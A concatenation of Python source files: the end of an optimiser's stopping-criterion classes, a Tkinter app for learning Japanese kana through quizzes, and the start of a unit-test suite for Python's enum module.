def get_criterion(self):
return None
def update(self, *args, **kwargs):
pass
@property
def is_met(self):
return self.key_pressed
class StoppingByQualityIndicator(TerminationCriterion):
def __init__(self, quality_indicator: QualityIndicator, expected_value: float, degree: float):
super(StoppingByQualityIndicator, self).__init__()
self.quality_indicator = quality_indicator
self.expected_value = expected_value
self.degree = degree
self.value = 0.0
def update(self, *args, **kwargs):
solutions = kwargs['SOLUTIONS']
if solutions:
self.value = self.quality_indicator.compute(solutions)
def get_criterion(self):
return self.expected_value
@property
def is_met(self):
if self.quality_indicator.is_minimization:
met = self.value * self.degree < self.expected_value
else:
met = self.value * self.degree > self.expected_value
return met
|
windows.py
|
"""
Tkinter frames that act as the apps windows..
"""
import os
from random import choice, shuffle
from threading import Thread
import tkinter as tk
from PIL import Image, ImageTk
from playsound import playsound, PlaysoundException
import kana_teacher.widgets as kw
# Path to app images and sounds.
ASSET_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "..", "assets")
FONT = ("Helvetica", 20)
SESS_SETTINGS = {
"index": 0, # Index of the kana being quizzed/learned.
"kana": None, # Kana currently being quizzed/learned.
"mode": ""} # Session mode, determines quizzing or learning.
class App(tk.Frame):
"""Object that runs the app."""
def __init__(self, root):
super().__init__(root)
self.root = root
self.bind("<Configure>", self._resize_callback)
self.root.title("Kana Learning")
self.load_frames()
self.pack(fill=tk.BOTH, expand=1)
def _resize_callback(self, event):
self.ins_label.config(wraplength=self.root.winfo_width() - 8)
def _msg_var_callback(self, *args):
self.ins_label.config(text=self.ins_var.get())
def load_frames(self):
# Args for ins_label.
self.ins_var = tk.StringVar()
self.ins_var.trace("w", self._msg_var_callback)
self.ins_label = tk.Label(
self, text="", font=FONT, textvariable=self.ins_var, bg="khaki2")
sep_frame = tk.Frame(self, height=6, bd=3, relief=tk.SUNKEN)
self.ins_label.pack(fill=tk.X, padx=4)
sep_frame.pack(fill=tk.X, padx=5)
self.windows = {
"setup": Setup(self),
"learn": Learn(self),
"speak": Speak(self),
"write": Write(self)}
self.windows["setup"].take_focus()
class Popup(tk.Toplevel):
"""Toplevel to message the user. Set timed to False to force user
to close this window before moving on.
"""
wait_time = 2000
def __init__(self, parent, msg, timed=True, **kwargs):
super().__init__(parent)
self.title("!!!")
# Offset popup from topleft of parent slightly.
x = parent.root.winfo_x() + 5
y = parent.root.winfo_y() + 5
self.geometry(f"+{x}+{y}")
m = tk.Message(self, text=msg, aspect=300, font=FONT)
b = tk.Button(
self, text="OK", command=self.destroy, bg="palevioletred1",
font=FONT)
m.pack(fill=tk.X, expand=1)
b.pack(side=tk.BOTTOM, pady=4)
if timed:
self.after(Popup.wait_time, self.destroy)
else:
self.grab_set()
parent.wait_window()
class AppWindow(tk.Frame):
"""Base class for all the app's windows."""
instructions = ""
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
self.app = app
self.root = app.root
self.widgets = {}
self.load_widgets()
def load_widgets(self):
pass
class Setup(AppWindow):
"""Window where settings are chosen before kicking off learning or
quizzes. Settings are saved to SESS_SETTINGS.
"""
instructions = "Choose kana, and choose learning or quizzing."
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
def _get_selected_kana(self):
"""Return a list of all kana highlighted from both charts."""
kana = []
for w in self.widgets["hira_chart"].grid_slaves():
if not isinstance(w, tk.Checkbutton):
if w.cget("bg") != "white":
kana.append((w.romaji, "hira"))
for w in self.widgets["kata_chart"].grid_slaves():
if not isinstance(w, tk.Checkbutton):
if w.cget("bg") != "white":
kana.append((w.romaji, "kata"))
shuffle(kana)
return kana
def load_widgets(self):
# Args and variables for the radio_buttons.
self.radio_var = tk.StringVar()
radio_buttons = []
modes = [
("Learn", "learn"),
("Speaking Quiz", "speak"),
("Writing Quiz", "write"),
("Both Quizzes", "both")]
self.rowconfigure(2, weight=1)
self.rowconfigure(6, weight=1)
# The charts and their checkbuttons.
kata_chart = kw.KanaChart(self, "kata")
hira_chart = kw.KanaChart(self, "hira")
self.off_chart = hira_chart
self.on_chart = kata_chart
chart_name_label = tk.Label(
self, text=self.on_chart.name, font=FONT)
select_all_button = tk.Button(
self, text="Select All", font=FONT,
command=self.select_all)
deselect_all_button = tk.Button(
self, text="Deselect All", font=FONT,
command=self.deselect_all)
switch_button = tk.Button(
self, text="Switch Kana", font=FONT,
command=self.switch_chart)
padding1 = tk.Label(self)
# The radio buttons.
for text, mode in modes:
rb = tk.Radiobutton(
self, text=text, font=FONT, var=self.radio_var, value=mode)
radio_buttons.append(rb)
padding2 = tk.Label(self)
start_button = tk.Button(
self, text="Start", font=FONT, command=self.start)
self.on_chart.grid(columnspan=5, pady=4, padx=4)
chart_name_label.grid(row=1, column=0)
select_all_button.grid(row=1, column=2)
deselect_all_button.grid(row=1, column=3)
switch_button.grid(row=1, column=4)
padding1.grid(row=2, sticky="ns")
radio_buttons[0].grid(row=4, column=1)
for i in range(len(radio_buttons[1:])):
radio_buttons[(i + 1)].grid(row=(i + 3), column=3)
padding2.grid(row=6, sticky="ns")
start_button.grid(row=7, column=4, padx=4, pady=4, sticky="e")
self.widgets["kata_chart"] = kata_chart
self.widgets["hira_chart"] = hira_chart
self.widgets["chart_name_label"] = chart_name_label
self.widgets["select_all_button"] = select_all_button
self.widgets["deselect_all_button"] = deselect_all_button
self.widgets["switch_button"] = switch_button
self.widgets["padding1"] = padding1
self.widgets["radio_buttons"] = radio_buttons
self.widgets["padding2"] = padding2
self.widgets["start_button"] = start_button
def take_focus(self):
self.app.pack_slaves()[-1].pack_forget() # unpack the previous window
self.app.ins_var.set(self.instructions)
# self.deselect_all(both=True) # better to leave previous selection?
self.pack(fill=tk.BOTH, expand=1)
def select_all(self):
"""Highlight all chart cells and select all checkbuttons."""
buttons = self.on_chart.grid_slaves(row=0)
buttons.extend(self.on_chart.grid_slaves(column=0))
for b in buttons:
if b.cget("bg") == "SystemButtonFace":
b.invoke()
def deselect_all(self, both=False):
"""Unhighlight all chart cells and deselect all checkbuttons."""
buttons = self.on_chart.grid_slaves(row=0)
buttons.extend(self.on_chart.grid_slaves(column=0))
if both:
buttons.extend(self.off_chart.grid_slaves(row=0))
buttons.extend(self.off_chart.grid_slaves(column=0))
for b in buttons:
if b.cget("bg") != "SystemButtonFace":
b.invoke()
def switch_chart(self):
"""Switch between displaying the kata and hira charts."""
self.on_chart, self.off_chart = self.off_chart, self.on_chart
self.off_chart.grid_remove()
self.widgets["chart_name_label"].config(text=self.on_chart.name)
self.on_chart.grid(row=0, column=0, columnspan=5)
def start(self):
"""Get user selected settings and start quizzing/teaching."""
kana = self._get_selected_kana()
if not kana:
Popup(self, "You must select some hiragana or katakana!")
return
SESS_SETTINGS["kana"] = kana
mode = self.radio_var.get()
if not mode:
Popup(self, "You must select a mode!")
return
SESS_SETTINGS["mode"] = mode
if SESS_SETTINGS["mode"] == "both":
next_window = choice(["speak", "write"])
self.app.windows[next_window].take_focus()
else:
self.app.windows[SESS_SETTINGS["mode"]].take_focus()
class Learn(AppWindow):
"""Window that is meant to teach the kana, as opposed to quiz."""
instructions = "Practice brush strokes and speaking."
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
def _load_next_kana(self):
"""Load the next kana's media."""
try:
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
except IndexError:
popup = Popup(
self, "You've looped through all the kana! Starting again...")
shuffle(SESS_SETTINGS["kana"])
SESS_SETTINGS["index"] = 0
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
self.widgets["stroke_gif"].destroy()
self.widgets["stroke_gif"] = kw.ImageLabel(self)
self.widgets["stroke_gif"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"))
self.widgets["stroke_gif"].grid(row=0, column=2, padx=4)
self.widgets["char_still"].unload()
self.widgets["char_still"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"), frame=-1)
self.audio_path = os.path.join(
ASSET_PATH, "sounds", "kana", kana[0] + ".wav")
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(">>> No audio for '{}'".format(
SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]))
def _cleanup(self):
"""Prevent the gif from looping when out of sight."""
self.widgets["stroke_gif"].destroy()
def load_widgets(self):
# Variables for the audio_button.
path = os.path.join(ASSET_PATH, "images", "sound.png")
self.audio_image = ImageTk.PhotoImage(file=path)
canvas = kw.DrawingCanvas(self)
stroke_gif = kw.ImageLabel(self)
char_still = kw.ImageLabel(self)
audio_button = tk.Button(
self, image=self.audio_image, command=self.play_audio)
quit_button = tk.Button(
self, text="Quit", font=FONT, command=self.quit)
quiz_button = tk.Button(
self, text="Quiz Me!", font=FONT, command=self.quiz)
next_button = tk.Button(
self, text="Next", font=FONT, comman=self.next)
canvas.grid(columnspan=2, rowspan=2, padx=4, sticky="nsew")
stroke_gif.grid(row=0, column=2, padx=4)
char_still.grid(row=1, column=2, padx=4)
audio_button.grid(row=2, column=2, padx=4, pady=4)
quit_button.grid(row=3, column=0, padx=4, pady=4, sticky="w")
quiz_button.grid(row=3, column=1, pady=4)
next_button.grid(row=3, column=2, padx=4, pady=4, sticky="e")
self.widgets["canvas"] = canvas
self.widgets["stroke_gif"] = stroke_gif
self.widgets["char_still"] = char_still
self.widgets["audio_button"] = audio_button
self.widgets["quit_button"] = quit_button
self.widgets["quiz_button"] = quiz_button
self.widgets["next_button"] = next_button
def take_focus(self):
self.app.pack_slaves()[-1].pack_forget()
self.app.ins_var.set(self.instructions)
self._load_next_kana()
self.pack(fill=tk.BOTH, expand=1)
def play_audio(self):
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(">>> No audio for '{}'".format(
SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]))
def quit(self):
self._cleanup()
self.app.windows["setup"].take_focus()
def quiz(self):
"""Change the session from learning to quizzing."""
self._cleanup()
SESS_SETTINGS["index"] = 0
SESS_SETTINGS["mode"] = "both"
next_window = choice(["speak", "write"])
self.app.windows[next_window].take_focus()
def next(self):
"""Move on to the next kana."""
self._cleanup()
SESS_SETTINGS["index"] += 1
self._load_next_kana()
class Speak(AppWindow):
"""Window that quizzes by having the user speak."""
instructions = "Say the character shown."
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
def _load_next_kana(self):
"""Load the next kana's media."""
try:
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
except IndexError:
popup = Popup(
self, "You've looped through all the kana! Starting again...")
shuffle(SESS_SETTINGS["kana"])
SESS_SETTINGS["index"] = 0
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
self.widgets["stroke_gif"].destroy()
self.widgets["stroke_gif"] = kw.ImageLabel(self)
self.widgets["stroke_gif"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"))
self.widgets["stroke_gif"].grid(row=0, column=2, padx=4)
self.audio_path = os.path.join(
ASSET_PATH, "sounds", "kana", kana[0] + ".wav")
def _cleanup(self):
"""Prevent the gif from looping when out of sight."""
self.widgets["stroke_gif"].destroy()
def load_widgets(self):
# Args for the audio_button.
path = os.path.join(ASSET_PATH, "images", "sound.png")
self.audio_image = ImageTk.PhotoImage(file=path)
stroke_gif = kw.ImageLabel(self)
audio_button = tk.Button(
self, image=self.audio_image, command=self.play_audio)
quit_button = tk.Button(
self, text="Quit", font=FONT, command=self.quit)
learn_button = tk.Button(
self, text="Learn", font=FONT, command=self.learn)
next_button = tk.Button(
self, text="Next", font=FONT, command=self.next)
stroke_gif.grid(columnspan=3, padx=4, pady=4)
audio_button.grid(row=0, column=0, pady=4)
quit_button.grid(row=2, column=0, padx=4, pady=4, sticky="w")
learn_button.grid(row=2, column=1, pady=4)
next_button.grid(row=2, column=2, padx=4, pady=4, sticky="e")
self.widgets["stroke_gif"] = stroke_gif
self.widgets["audio_button"] = audio_button
self.widgets["quit_button"] = quit_button
self.widgets["learn_button"] = learn_button
self.widgets["next_button"] = next_button
def take_focus(self):
self.app.pack_slaves()[-1].pack_forget()
self.app.ins_var.set(self.instructions)
self._load_next_kana()
self.pack(fill=tk.BOTH, expand=1)
def play_audio(self):
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(">>> No audio for '{}'".format(
SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]))
def quit(self):
self._cleanup()
self.app.windows["setup"].take_focus()
def learn(self):
"""Switch session from quizzing to learning."""
self._cleanup()
SESS_SETTINGS["mode"] = "learn"
self.app.windows["learn"].take_focus()
def next(self):
"""Move on to the next kana."""
self._cleanup()
SESS_SETTINGS["index"] += 1
if SESS_SETTINGS["mode"] == "both":
next_window = choice(["speak", "write"])
else:
next_window = "speak"
if next_window == "speak":
self._load_next_kana()
else:
self.app.windows[next_window].take_focus()
class Write(AppWindow):
"""Window that quizzes by having the user write."""
instructions = "Write the character spoken."
def __init__(self, app, **kwargs):
super().__init__(app, **kwargs)
def _load_next_kana(self):
try:
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
except IndexError:
popup = Popup(
self, "You've looped through all the kana! Starting again...")
shuffle(SESS_SETTINGS["kana"])
SESS_SETTINGS["index"] = 0
kana = SESS_SETTINGS["kana"][SESS_SETTINGS["index"]]
self.widgets["canvas"].erase()
self.widgets["stroke_gif"].destroy()
self.widgets["stroke_gif"] = kw.ImageLabel(self)
self.widgets["stroke_gif"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"))
self.widgets["stroke_gif"].grid(row=0, column=2, padx=4)
self.widgets["char_still"].unload()
self.widgets["char_still"].load(os.path.join(
ASSET_PATH, "images", kana[1], kana[0] + ".gif"), frame=-1)
self.widgets["show_button"].grid(row=0, column=2, padx=4, pady=4)
self.widgets["stroke_gif"].grid_forget()
self.widgets["char_still"].grid_forget()
self.audio_path = os.path.join(
ASSET_PATH, "sounds", "kana", kana[0] + ".wav")
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(">>> No audio for '{}'...".format(
SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]))
def _cleanup(self):
"""Prevent the gif from looping when out of sight."""
self.widgets["stroke_gif"].destroy()
def load_widgets(self):
# Args for the audio_button.
path = os.path.join(ASSET_PATH, "images", "sound.png")
self.audio_image = ImageTk.PhotoImage(file=path)
canvas = kw.DrawingCanvas(self)
show_button = tk.Button(
self, text="Show Answer", font=FONT, command=self.show)
stroke_gif = kw.ImageLabel(self)
char_still = kw.ImageLabel(self)
audio_button = tk.Button(
self, image=self.audio_image, command=self.play_audio)
quit_button = tk.Button(
self, text="Quit", font=FONT, command=self.quit)
learn_button = tk.Button(
self, text="Learn", font=FONT, command=self.learn)
next_button = tk.Button(
self, text="Next", font=FONT, command=self.next)
canvas.grid(rowspan=2, columnspan=2, padx=4, pady=4, sticky="nsew")
show_button.grid(row=0, column=2, padx=4, pady=4)
audio_button.grid(row=2, column=0, padx=4, pady=4)
quit_button.grid(row=3, column=0, padx=4, pady=4, sticky="w")
learn_button.grid(row=3, column=1, padx=4, pady=4)
next_button.grid(row=3, column=2, padx=4, pady=4, sticky="e")
self.widgets["canvas"] = canvas
self.widgets["show_button"] = show_button
self.widgets["stroke_gif"] = stroke_gif
self.widgets["char_still"] = char_still
self.widgets["audio_button"] = audio_button
def take_focus(self):
self.app.pack_slaves()[-1].pack_forget()
self.app.ins_var.set(self.instructions)
self._load_next_kana()
self.pack(fill=tk.BOTH, expand=1)
def show(self):
"""Displays the character gif and still image."""
self.widgets["show_button"].grid_remove()
self.widgets["stroke_gif"].grid(row=0, column=2, padx=4, pady=4)
self.widgets["char_still"].grid(row=1, column=2, padx=4, pady=4)
def play_audio(self):
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(f">>> No audio for "
"'{SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]}'...")
def quit(self):
self._cleanup()
self.app.windows["setup"].take_focus()
def learn(self):
"""Switch session from quizzing to learning."""
self._cleanup()
SESS_SETTINGS["mode"] = "learn"
self.app.windows["learn"].take_focus()
def next(self):
"""Move on to the next kana."""
self._cleanup()
SESS_SETTINGS["index"] += 1
if SESS_SETTINGS["mode"] == "both":
next_window = choice(["speak", "write"])
else:
next_window = "write"
if next_window == "write":
self._load_next_kana()
else:
self.app.windows[next_window].take_focus()
|
test_enum.py
|
import enum
import doctest
import inspect
import os
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto
from enum import STRICT, CONFORM, EJECT, KEEP, _simple_enum, _test_simple_enum
from enum import verify, UNIQUE, CONTINUOUS, NAMED_FLAGS
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
python_version = sys.version_info[:2]
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(enum))
if os.path.exists('Doc/library/enum.rst'):
tests.addTests(doctest.DocFileSuite(
'../../Doc/library/enum.rst',
optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE,
))
return tests
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), season)
self.assertEqual(repr(e), 'Season.{0}'.format(season))
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
3 in Season
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum memmbers before 3.12',
)
def test_contains_tf(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
self.assertTrue(3 in Season)
self.assertFalse('AUTUMN' in Season)
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as ._bad_., are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
@unittest.skipIf(
python_version < (3, 12),
'mixin-format is still using member.value',
)
def test_mixin_format_warning(self):
with self.assertWarns(DeprecationWarning):
self.assertEqual(f'{self.Grades.B}', 'Grades.B')
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_mixin_format_warning(self):
with self.assertWarns(DeprecationWarning):
self.assertEqual(f'{self.Grades.B}', '4')
def assertFormatIsValue(self, spec, member):
if python_version < (3, 12) and (not spec or spec in ('{}','{:}')):
with self.assertWarns(DeprecationWarning):
self.assertEqual(spec.format(member), spec.format(member.value))
else:
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
